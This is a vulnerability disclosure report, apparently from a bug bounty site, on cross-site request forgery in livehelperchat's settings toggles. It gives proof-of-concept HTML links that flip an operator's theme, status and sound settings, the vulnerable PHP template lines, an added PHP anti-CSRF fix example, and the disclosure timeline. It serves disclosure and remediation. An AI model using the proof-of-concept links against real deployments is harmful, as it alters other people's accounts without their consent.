Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

Valid

Reported on Dec 14th 2021

Description

Switching the following per-user settings on or off is vulnerable to CSRF: each toggle is a plain GET link with no anti-CSRF token, so a logged-in operator who opens an attacker-supplied link has the setting changed for them (see the proof of concept below):

- Dark/bright
- Auto uppercase sentences
- Do not scroll to the bottom on chat open
- Auto preload previous visitor chat messages
- Load previous message on scroll
- New messages
- New chats
- Online
- Based on activity
- Visible

Proof of Concept

<a href="https://demo.livehelperchat.com/site_admin/front/switchdashboard/(action)/mode">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_uppercase/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/no_scroll_bottom/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_preload/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/scroll_load/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/chat_message/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/new_chat_sound/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setoffline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setalwaysonline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setinvisible/true">CLICK ME!</a>

Impact

This vulnerability lets an attacker trick a logged-in user into enabling or disabling personal settings on their own account, simply by getting them to open a crafted link.

Occurrences

  • Auto preload previous visitor chat messages
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/auto_preload/<?php echo erLhcoreClassModelUserSetting::getSetting('auto_preload',0) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('auto_preload',0) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Auto preload previous visitor chat messages');?></a>
  • Dark/bright
<a title="<?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('chat/user_settings','Toggle between dark and white themes');?>" href="<?php echo erLhcoreClassDesign::baseurl('front/switchdashboard')?>/(action)/mode" class="dropdown-item pl-2"><span class="material-icons">settings_brightness</span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('pagelayout/pagelayout','Dark/bright');?></a>
  • New chats
  • New messages
  • Auto uppercase sentences
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/auto_uppercase/<?php echo erLhcoreClassModelUserSetting::getSetting('auto_uppercase',1) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('auto_uppercase',1) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Auto uppercase sentences');?></a>
  • Load previous message on scroll
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/scroll_load/<?php echo erLhcoreClassModelUserSetting::getSetting('scroll_load',1) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('scroll_load',1) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Load previous message on scroll');?></a>
  • Do not scroll to the bottom on chat open
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/no_scroll_bottom/<?php echo erLhcoreClassModelUserSetting::getSetting('no_scroll_bottom',0) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('no_scroll_bottom',0) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Do not scroll to the bottom on chat open');?></a>
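
Every toggle above is a bare GET link, so a fix has two parts: stop changing state on GET, and bind each toggle to a per-session anti-CSRF token that a third-party page cannot know. The PHP below is an added illustration written for this page; it is not livehelperchat's code and not its actual fix (the timeline references commit 2a98c6, but that change's contents are not on this page). The function names, the `$session` and `$settings` arrays, and the `$request` shape are assumptions standing in for the framework's real session and controller objects.

```php
<?php
// Added example (not livehelperchat code): a minimal anti-CSRF pattern for a
// per-user settings toggle. csrf_token(), csrf_valid(), set_setting_*() and
// render_toggle() are hypothetical names; $session/$settings are plain arrays
// standing in for the real session store and user-setting model.

declare(strict_types=1);

// Issue one random token per session and keep it server-side.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Compare the submitted token with the session copy in constant time.
function csrf_valid(array $session, ?string $submitted): bool
{
    if ($submitted === null || empty($session['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $submitted);
}

// Vulnerable shape, as the report describes it: any request to the URL flips
// the setting, so an <a href> or <img src> on another site is enough.
function set_setting_vulnerable(array &$settings, string $name, string $value): bool
{
    $settings[$name] = (int) $value;
    return true;
}

// Hardened shape: refuse GET, then refuse anything without a matching token.
function set_setting_hardened(array &$settings, array $session, array $request, string $name, string $value): bool
{
    if (($request['method'] ?? 'GET') !== 'POST') {
        return false; // state never changes on GET
    }
    if (!csrf_valid($session, $request['csrf_token'] ?? null)) {
        return false; // token missing or does not match the session
    }
    $settings[$name] = (int) $value;
    return true;
}

// Render the toggle as a POST form carrying the token instead of a bare link.
function render_toggle(string $baseUrl, string $name, int $current, string $token): string
{
    $next = $current === 0 ? 1 : 0;
    return sprintf(
        '<form method="post" action="%s/%s/%d">'
        . '<input type="hidden" name="csrf_token" value="%s">'
        . '<button type="submit" class="dropdown-item pl-2">'
        . '<span class="material-icons">%s</span></button></form>',
        htmlspecialchars($baseUrl, ENT_QUOTES),
        htmlspecialchars($name, ENT_QUOTES),
        $next,
        htmlspecialchars($token, ENT_QUOTES),
        $current ? 'check' : 'remove_done'
    );
}

// Constructed walk-through with no real session or HTTP layer.
$session  = [];
$settings = ['auto_preload' => 0];
$token    = csrf_token($session);

$attempts = [
    'cross-site GET link'  => ['method' => 'GET'],                              // the report's PoC
    'POST, guessed token'  => ['method' => 'POST', 'csrf_token' => 'deadbeef'], // constructed wrong value
    'POST, session token'  => ['method' => 'POST', 'csrf_token' => $token],     // the site's own form
];
foreach ($attempts as $label => $request) {
    $applied = set_setting_hardened($settings, $session, $request, 'auto_preload', '1');
    printf("%-22s %s (auto_preload=%d)\n", $label, $applied ? 'applied' : 'rejected', $settings['auto_preload']);
}

// The unprotected handler, for contrast, changes state on the same GET.
$unprotected = ['auto_preload' => 0];
set_setting_vulnerable($unprotected, 'auto_preload', '1');
printf("%-22s applied (auto_preload=%d)\n", 'vulnerable handler', $unprotected['auto_preload']);

echo render_toggle('/site_admin/user/setsetting', 'auto_preload', $settings['auto_preload'], $token), PHP_EOL;
```

Run it with `php example.php`. The same check applies to the `setsettingajax`, `setoffline`, `setalwaysonline` and `setinvisible` endpoints listed in the proof of concept: the page's own JavaScript should send them as POST with the token in the body or a header. Marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer, but it is the server-side token check that closes the hole regardless of the victim's browser.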

Timeline

- We are processing your report and will contact the livehelperchat team within 24 hours. (a month ago)
- KhanhCM modified their report (a month ago)
- We have contacted a member of the livehelperchat team and are waiting to hear back (a month ago)
- Remigijus Kiminas validated this vulnerability (a month ago)
- KhanhCM has been awarded the disclosure bounty
- The fix bounty is now up for grabs
- Remigijus Kiminas confirmed that a fix has been merged on 2a98c6 (a month ago)
- The fix bounty has been dropped
- Validated occurrences: user_box.tpl.php#L88, user_box.tpl.php#L79, user_box.tpl.php#L85, user_box.tpl.php#L30, user_box.tpl.php#L82, lh.js#L3419, lh.js#L3401